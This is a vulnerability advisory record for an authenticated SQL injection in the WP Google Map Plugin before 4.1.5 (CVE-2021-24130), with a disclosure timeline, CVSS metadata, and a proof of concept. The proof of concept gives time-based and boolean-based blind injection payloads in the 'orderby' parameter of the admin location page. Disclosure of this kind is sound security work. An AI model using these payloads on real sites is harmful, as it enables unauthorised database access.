Description
The Manage Locations page within the plugin settings was vulnerable to SQL Injection by a high-privileged user (admin+).

Edit (WPScanTeam):
September 8th, 2020 - Confirmed & Escalated to WP plugins team
September 8th, 2020 - WP plugins team investigating
November 25th, 2020 - No updates, disclosing
December 8th, 2020 - v4.1.4 released, issue still present (improper fix)
January 27th, 2021 - v4.1.5 released, fixing the issue
Related
{"id": "WPEX-ID:46AF9A4D-67AC-4E08-A753-A2A44245F4F8", "type": "wpexploit", "bulletinFamily": "exploit", "title": "WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection", "description": "The Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+). Edit (WPScanTeam): September 8th, 2020 - Confirmed & Escalated to WP plugins team September 8th, 2020 - WP plugins team investigating November 25th, 2020 - No updates, disclosing December 8th, 2020 - v4.1.4 released, issue still present (improper fix) January 27th, 2021 - v4.1.5 released, fixing the issue\n", "published": "2020-11-25T00:00:00", "modified": "2021-02-01T11:01:42", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Nguyen Anh Tien", "references": ["https://plugins.trac.wordpress.org/changeset/2463467/wp-google-map-plugin"], "cvelist": ["CVE-2021-24130"], "lastseen": "2021-02-15T22:32:03", "viewCount": 109, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24130"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:46AF9A4D-67AC-4E08-A753-A2A44245F4F8"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24130"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:46AF9A4D-67AC-4E08-A753-A2A44245F4F8"]}]}, "exploitation": null, "vulnersScore": 5.2}, "sourceData": "- Vulnerable parameters: `order` and `orderby`\r\n\r\n1. Add at least two locations (via /wp-admin/admin.php?page=wpgmp_form_location) and execute sleep query:\r\n\r\nhttps://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=desc&orderby=(sleep(5))\r\n\r\n2. 
The request will be delayed by 10 seconds.\r\n\r\n---\r\nParameter: #1* (URI)\r\n Type: boolean-based blind\r\n Title: Boolean-based blind - Parameter replace (original value)\r\n Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(SELECT (CASE WHEN (2605=2605) THEN '' ELSE (SELECT 3517 UNION SELECT 5558) END))\r\n\r\n Type: time-based blind\r\n Title: MySQL >= 5.0.12 time-based blind - Parameter replace\r\n Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(CASE WHEN (6922=6922) THEN SLEEP(5) ELSE 6922 END)\r\n---\r\n", "generation": 1, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645979108}}
{"cve": [{"lastseen": "2022-03-23T14:47:23", "description": "Unvalidated input in the WP Google Map Plugin WordPress plugin, versions before 4.1.5, in the Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+).", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-18T15:15:00", "type": "cve", "title": "CVE-2021-24130", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24130"], "modified": "2021-03-24T17:11:00", "cpe": [], "id": "CVE-2021-24130", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24130", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2021-02-15T22:32:03", "bulletinFamily": "software", "cvelist": ["CVE-2021-24130"], "description": "The Manage Locations page within the plugin settings was vulnerable to SQL Injection through a high privileged user (admin+). 
Edit (WPScanTeam): September 8th, 2020 - Confirmed & Escalated to WP plugins team September 8th, 2020 - WP plugins team investigating November 25th, 2020 - No updates, disclosing December 8th, 2020 - v4.1.4 released, issue still present (improper fix) January 27th, 2021 - v4.1.5 released, fixing the issue\n\n### PoC\n\n\\- Vulnerable parameters: `order` and `orderby` 1\\. Add at least two locations (via /wp-admin/admin.php?page=wpgmp_form_location) and execute sleep query: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=desc&orderby=(sleep(5)) 2\\. The request will be delayed by 10 seconds. \\--- Parameter: #1* (URI) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(SELECT (CASE WHEN (2605=2605) THEN '' ELSE (SELECT 3517 UNION SELECT 5558) END)) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: https://example.com/wp-admin/admin.php?page=wpgmp_manage_location&order=asc&orderby=(CASE WHEN (6922=6922) THEN SLEEP(5) ELSE 6922 END) \\--- \n", "modified": "2021-02-01T11:01:42", "published": "2020-11-25T00:00:00", "id": "WPVDB-ID:46AF9A4D-67AC-4E08-A753-A2A44245F4F8", "href": "https://wpscan.com/vulnerability/46af9a4d-67ac-4e08-a753-a2a44245f4f8", "type": "wpvulndb", "title": "WP Google Map Plugin < 4.1.5 - Authenticated SQL Injection", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}]}